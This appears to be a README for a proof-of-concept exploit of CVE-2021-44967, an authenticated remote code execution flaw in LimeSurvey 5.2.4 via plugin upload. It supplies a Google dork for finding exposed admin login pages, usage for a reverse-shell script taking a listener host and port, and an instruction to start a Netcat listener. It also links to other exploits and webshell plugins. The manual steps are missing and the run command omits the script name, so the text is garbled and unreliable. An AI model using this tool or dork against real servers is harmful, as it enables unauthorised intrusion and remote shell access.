
CVE-2021-44967 の PoC エクスプロイト
# Exploit Title: LimeSurvey 5.2.4 - Authenticated Remote Code Execution (RCE)
# Google Dork: inurl:limesurvey/index.php/admin/authentication/sa/login
# Date: 05/12/2021
# Discovered by: Y1LD1R1M
# Exploit Author: D3Ext
# Vendor Homepage: https://www.limesurvey.org/
# Software Link: https://download.limesurvey.org/latest-stable-release/limesurvey5.2.4+211129.zip
# Version: 5.2.x
# Tested on: Kali Linux 2025
# CVE: CVE-2021-44967
LimeSurvey 5.2.4 には、プラグインのアップロードおよびインストール機能を介したリモートコード実行(RCE)の脆弱性が存在します。これにより、リモートの悪意あるユーザーが任意の PHP コードファイルをアップロードできる可能性があります。
この脆弱性を手動で悪用するには、以下の手順を実行します。
/upload/plugins/<plugin_name>/<php_file> からアクセス可能になりますusage: CVE-2021-44967.py [-h] --url URL --user USER --password PASSWORD --lhost LHOST --lport LPORT [--verbose]
CVE-2021-44967 - LimeSurvey Authenticated RCE
options:
-h, --help show this help message and exit
--url URL URL of the LimeSurvey web root
--user USER username to log in
--password PASSWORD password of the username
--lhost LHOST local host to receive the reverse shell
--lport LPORT local port to receive the reverse shell
--verbose enable verbose
Netcat リスナーを起動し、次のようにエクスプロイトを実行します。
python3 --url <URL> --user <username> --password <password> --lhost <local host> --lport <local port>
https://github.com/Y1LD1R1M-1337/Limesurvey-RCE
https://www.exploit-db.com/exploits/50573
https://github.com/p0dalirius/LimeSurvey-webshell-plugin
https://ine.com/blog/cve-2021-44967-limesurvey-rce
https://pentest-tools.com/vulnerabilities-exploits/limesurvey-524-rce-vulnerability_13029
このプロジェクトは MIT ライセンスの下で提供されています
著作権 © 2025, D3Ext